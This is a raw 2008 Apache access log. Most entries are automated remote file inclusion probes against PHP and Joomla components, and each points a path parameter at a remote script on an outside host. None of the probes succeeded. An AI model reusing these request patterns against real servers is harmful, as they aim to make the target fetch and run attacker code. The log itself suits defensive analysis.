64.255.237.141 - - [10/Sep/2008:05:16:15 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
64.255.237.141 - - [10/Sep/2008:05:17:12 -0400] "GET /logs/access_log.Q108071200//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
83.222.27.201 - - [10/Sep/2008:05:17:24 -0400] "GET /images/errors.php?error=http://www.diandrahot.com.ar/classes/phpmailer//language/phpmailer?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
207.44.236.14 - - [10/Sep/2008:05:17:33 -0400] "GET /logs/access_log.Q108071200//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
64.255.237.141 - - [10/Sep/2008:05:18:03 -0400] "GET /logs/access_log.Q108072500//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
64.255.237.141 - - [10/Sep/2008:05:18:03 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
64.255.237.141 - - [10/Sep/2008:05:18:04 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
212.69.226.12 - - [10/Sep/2008:05:18:11 -0400] "GET /logs/error_log.Q108051800//admin/classes/errors.php?error=http://www.geocities.com/cute_j3ny/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
64.255.237.141 - - [10/Sep/2008:05:18:19 -0400] "GET /logs/access_log.Q108033100//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.59.12.99 - - [10/Sep/2008:05:19:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.44.236.14 - - [10/Sep/2008:05:19:34 -0400] "GET /logs/access_log.Q108082100//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
207.44.236.14 - - [10/Sep/2008:05:19:35 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
207.44.236.14 - - [10/Sep/2008:05:19:35 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
74.6.17.183 - - [10/Sep/2008:05:19:14 -0400] "GET /logs/error_log.Q108081100 HTTP/1.0" 200 1834869 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.55.133.16 - - [10/Sep/2008:05:20:16 -0400] "GET /logs/error_log.Q108070700//main.php?appserv_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
216.55.133.16 - - [10/Sep/2008:05:20:17 -0400] "GET //main.php?appserv_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
216.55.133.16 - - [10/Sep/2008:05:20:18 -0400] "GET /logs//main.php?appserv_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
92.51.145.83 - - [10/Sep/2008:05:20:45 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
92.51.145.83 - - [10/Sep/2008:05:20:46 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
80.45.18.23 - - [10/Sep/2008:05:21:26 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
80.45.18.23 - - [10/Sep/2008:05:21:26 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
208.69.127.188 - - [10/Sep/2008:05:21:28 -0400] "GET /logs/access_log.Q108062800//admin/classes/errors.php?error=http://www.trosken.com/id.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
80.45.18.23 - - [10/Sep/2008:05:21:28 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
80.45.18.23 - - [10/Sep/2008:05:21:28 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
208.69.127.188 - - [10/Sep/2008:05:21:28 -0400] "GET //admin/classes/errors.php?error=http://www.trosken.com/id.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
208.69.127.188 - - [10/Sep/2008:05:21:28 -0400] "GET /logs//admin/classes/errors.php?error=http://www.trosken.com/id.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
208.69.127.188 - - [10/Sep/2008:05:21:49 -0400] "GET /logs/access_log.Q108072300//admin/classes/errors.php?error=http://www.trosken.com/id.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
216.55.140.43 - - [10/Sep/2008:05:22:12 -0400] "GET /logs/error_log.Q108060100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.69"
216.55.140.43 - - [10/Sep/2008:05:22:12 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.69"
216.55.140.43 - - [10/Sep/2008:05:22:12 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.69"
129.142.67.13 - - [10/Sep/2008:05:22:25 -0400] "GET /logs/access_log.Q108072400//components/com_facileforms/facileforms.frame.php?ff_compath=http://seolinks.karpiknet.com/readme.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
208.69.231.178 - - [10/Sep/2008:05:22:39 -0400] "GET /logs/access_log.Q108040800///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.69.231.178 - - [10/Sep/2008:05:22:39 -0400] "GET ///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.69.231.178 - - [10/Sep/2008:05:22:40 -0400] "GET /logs///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.69.231.178 - - [10/Sep/2008:05:22:41 -0400] "GET /logs/access_log.Q108040800///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
208.69.231.178 - - [10/Sep/2008:05:22:41 -0400] "GET ///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
208.75.225.10 - - [10/Sep/2008:05:22:41 -0400] "GET /usr/extensions/get_infochannel.inc.php//usr/extensions/get_infochannel.inc.php?root_path=http://www.acc-advertising.com/img/gid.txt?%0D?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
208.75.225.10 - - [10/Sep/2008:05:22:45 -0400] "GET /logs/access_log.Q108071700%20/usr/extensions/get_infochannel.inc.php//usr/extensions/get_infochannel.inc.php?root_path=http://www.acc-advertising.com/img/gid.txt?%0D?? HTTP/1.1" 404 304 "-" "libwww-perl/5.811"
208.69.231.178 - - [10/Sep/2008:05:22:45 -0400] "GET /logs///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
208.75.225.10 - - [10/Sep/2008:05:22:45 -0400] "GET /logs/usr/extensions/get_infochannel.inc.php//usr/extensions/get_infochannel.inc.php?root_path=http://www.acc-advertising.com/img/gid.txt?%0D?? HTTP/1.1" 404 281 "-" "libwww-perl/5.811"
74.6.17.183 - - [10/Sep/2008:05:21:52 -0400] "GET /logs/access_log.Q107101200 HTTP/1.0" 200 2569057 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
208.69.231.178 - - [10/Sep/2008:05:22:59 -0400] "GET /logs/access_log.Q108040800///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 249 "-" "Mozilla/3.0 (OS/2; U)"
208.69.231.178 - - [10/Sep/2008:05:23:03 -0400] "GET /logs/access_log.Q108062900///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
208.69.231.178 - - [10/Sep/2008:05:23:03 -0400] "GET /logs///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 227 "-" "Mozilla/3.0 (OS/2; U)"
208.69.231.178 - - [10/Sep/2008:05:23:04 -0400] "GET ///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 222 "-" "Mozilla/3.0 (OS/2; U)"
74.6.17.183 - - [10/Sep/2008:05:22:56 -0400] "GET /logs/access_log.Q107072600 HTTP/1.0" 200 3516342 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.250.238.63 - - [10/Sep/2008:05:23:08 -0400] "GET /logs/access_log.Q108081300//security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://dennisrikkers.nl/includes/log/id.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.813"
209.250.238.63 - - [10/Sep/2008:05:23:08 -0400] "GET /logs//security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://dennisrikkers.nl/includes/log/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.813"
209.250.238.63 - - [10/Sep/2008:05:23:08 -0400] "GET //security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://dennisrikkers.nl/includes/log/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
209.250.238.63 - - [10/Sep/2008:05:23:08 -0400] "GET /logs/error_log.Q108061400//security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://dennisrikkers.nl/includes/log/id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.813"
208.69.231.178 - - [10/Sep/2008:05:23:22 -0400] "GET /logs/access_log.Q108062900///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.69.231.178 - - [10/Sep/2008:05:23:51 -0400] "GET /logs/access_log.Q108062900///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 249 "-" "Mozilla/3.0 (OS/2; U)"
216.55.140.43 - - [10/Sep/2008:05:23:59 -0400] "GET /logs/error_log.Q108081800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.69"
209.59.12.99 - - [10/Sep/2008:05:24:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.75.225.10 - - [10/Sep/2008:05:24:39 -0400] "GET /logs/error_log.Q108071700/usr/extensions/get_infochannel.inc.php//usr/extensions/get_infochannel.inc.php?root_path=http://www.acc-advertising.com/img/gid.txt?%0D?? HTTP/1.1" 404 302 "-" "libwww-perl/5.811"
208.75.225.10 - - [10/Sep/2008:05:24:39 -0400] "GET /logs/access_log.Q108071700/usr/extensions/get_infochannel.inc.php//usr/extensions/get_infochannel.inc.php?root_path=http://www.acc-advertising.com/img/gid.txt?%0D?? HTTP/1.1" 404 303 "-" "libwww-perl/5.811"
203.104.97.42 - - [10/Sep/2008:05:25:54 -0400] "GET /logs/access_log.Q108081300///vwar/convert/errors.php?error=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
203.104.97.42 - - [10/Sep/2008:05:25:57 -0400] "GET ///vwar/convert/errors.php?error=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
203.104.97.42 - - [10/Sep/2008:05:25:57 -0400] "GET /logs///vwar/convert/errors.php?error=http://www.ps-mag.com/magazine/2007/10/idr.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
67.15.14.45 - - [10/Sep/2008:05:26:16 -0400] "GET /logs/error_log.Q108070700//appserv/main.php?appserv_root=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
67.15.14.45 - - [10/Sep/2008:05:26:16 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 220 "-" "libwww-perl/5.808"
67.15.14.45 - - [10/Sep/2008:05:26:16 -0400] "GET //appserv/main.php?appserv_root=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 215 "-" "libwww-perl/5.808"
208.69.231.178 - - [10/Sep/2008:05:26:26 -0400] "GET ///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
208.69.231.178 - - [10/Sep/2008:05:26:26 -0400] "GET /logs/access_log.Q108040800///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
208.69.231.178 - - [10/Sep/2008:05:26:26 -0400] "GET /logs///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
208.69.231.178 - - [10/Sep/2008:05:26:26 -0400] "GET /logs/access_log.Q108040800///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
208.69.231.178 - - [10/Sep/2008:05:26:26 -0400] "GET /logs///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
208.69.231.178 - - [10/Sep/2008:05:26:27 -0400] "GET ///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
208.69.231.178 - - [10/Sep/2008:05:26:31 -0400] "GET /logs/access_log.Q108040800///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
208.69.231.178 - - [10/Sep/2008:05:26:31 -0400] "GET ///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
208.69.231.178 - - [10/Sep/2008:05:26:31 -0400] "GET /logs///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
208.69.231.178 - - [10/Sep/2008:05:26:35 -0400] "GET /logs/access_log.Q108062900///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
208.69.231.178 - - [10/Sep/2008:05:26:39 -0400] "GET /logs/access_log.Q108062900///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
208.69.231.178 - - [10/Sep/2008:05:27:10 -0400] "GET /logs/access_log.Q108062900///vwar/backup/errors.php?error=http://h1.ripway.com/babik/bangsat/idv6.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
207.44.236.14 - - [10/Sep/2008:05:27:21 -0400] "GET /logs/access_log.Q108051500//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
207.44.236.14 - - [10/Sep/2008:05:27:21 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
207.44.236.14 - - [10/Sep/2008:05:27:22 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
216.55.133.16 - - [10/Sep/2008:05:28:26 -0400] "GET //appserv/main.php?appserv_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
216.55.133.16 - - [10/Sep/2008:05:28:36 -0400] "GET /logs/error_log.Q108070700%20//appserv/main.php?appserv_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
216.55.133.16 - - [10/Sep/2008:05:28:36 -0400] "GET /logs//appserv/main.php?appserv_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
63.246.137.170 - - [10/Sep/2008:05:28:55 -0400] "GET /errors.php?error=http://www.kolping-oberndorf.at//components/com_simpleboard/index.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
63.246.137.170 - - [10/Sep/2008:05:28:55 -0400] "GET /logs/errors.php?error=http://www.kolping-oberndorf.at//components/com_simpleboard/index.txt?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
209.59.12.99 - - [10/Sep/2008:05:29:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.15.129.168 - - [10/Sep/2008:05:29:56 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.apnic.net/index.html? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
92.51.145.83 - - [10/Sep/2008:05:31:07 -0400] "GET /logs/error_log.Q108082400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.803"
92.51.145.83 - - [10/Sep/2008:05:31:07 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
92.51.145.83 - - [10/Sep/2008:05:31:20 -0400] "GET /logs/access_log.Q108071300//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.803"
92.51.145.83 - - [10/Sep/2008:05:31:32 -0400] "GET /logs/error_log.Q108082400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.803"
92.51.145.83 - - [10/Sep/2008:05:31:33 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
92.51.145.83 - - [10/Sep/2008:05:31:47 -0400] "GET /logs/access_log.Q108071300//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.803"
209.250.238.63 - - [10/Sep/2008:05:33:05 -0400] "GET //com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dennisrikkers.nl/includes/log/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
209.250.238.63 - - [10/Sep/2008:05:33:05 -0400] "GET /logs/access_log.Q108080800//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dennisrikkers.nl/includes/log/id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.813"
209.250.238.63 - - [10/Sep/2008:05:33:05 -0400] "GET /logs//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dennisrikkers.nl/includes/log/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.813"
209.250.238.63 - - [10/Sep/2008:05:33:05 -0400] "GET /logs/access_log.Q108080300//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dennisrikkers.nl/includes/log/id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.813"
80.247.64.150 - - [10/Sep/2008:05:33:23 -0400] "GET /logs/access_log.Q108062800//admin/classes/errors.php?error=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
80.247.64.150 - - [10/Sep/2008:05:33:23 -0400] "GET //admin/classes/errors.php?error=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.808"
80.247.64.150 - - [10/Sep/2008:05:33:24 -0400] "GET /logs//admin/classes/errors.php?error=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
209.59.12.99 - - [10/Sep/2008:05:34:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.205.111.117 - - [10/Sep/2008:05:34:14 -0400] "GET /pagina.php?u=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
67.205.111.117 - - [10/Sep/2008:05:34:15 -0400] "GET /logs/pagina.php?u=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
67.205.111.117 - - [10/Sep/2008:05:34:15 -0400] "GET /logs/access_log.Q108081400/pagina.php?u=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
67.15.80.42 - - [10/Sep/2008:05:34:28 -0400] "GET /logs/access_log.Q108082300//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.15.80.42 - - [10/Sep/2008:05:34:28 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.15.80.42 - - [10/Sep/2008:05:34:30 -0400] "GET /logs/access_log.Q108082300//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.15.80.42 - - [10/Sep/2008:05:34:30 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.15.80.42 - - [10/Sep/2008:05:34:52 -0400] "GET /logs/error_log.Q108082300//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.15.80.42 - - [10/Sep/2008:05:34:56 -0400] "GET /logs/error_log.Q108082300//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.205.111.117 - - [10/Sep/2008:05:34:56 -0400] "GET /logs/access_log.Q108062700/pagina.php?u=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
67.15.80.42 - - [10/Sep/2008:05:35:30 -0400] "GET /logs/access_log.Q108082300//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt???? HTTP/1.1" 404 260 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
67.15.80.42 - - [10/Sep/2008:05:35:30 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt???? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
67.15.80.42 - - [10/Sep/2008:05:35:30 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
67.15.80.42 - - [10/Sep/2008:05:35:34 -0400] "GET /logs/error_log.Q108082300//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt???? HTTP/1.1" 404 259 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
216.55.133.16 - - [10/Sep/2008:05:35:41 -0400] "GET /logs/error_log.Q108070700%20//appserv/main.php?appserv_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
216.55.133.16 - - [10/Sep/2008:05:35:45 -0400] "GET //appserv/main.php?appserv_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
216.55.133.16 - - [10/Sep/2008:05:35:45 -0400] "GET /logs//appserv/main.php?appserv_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
82.146.59.116 - - [10/Sep/2008:05:36:59 -0400] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.borsaimmobiliare.net/readme.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.814"
67.15.14.45 - - [10/Sep/2008:05:37:08 -0400] "GET /logs/error_log.Q108070700%20//appserv/main.php?appserv_root=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
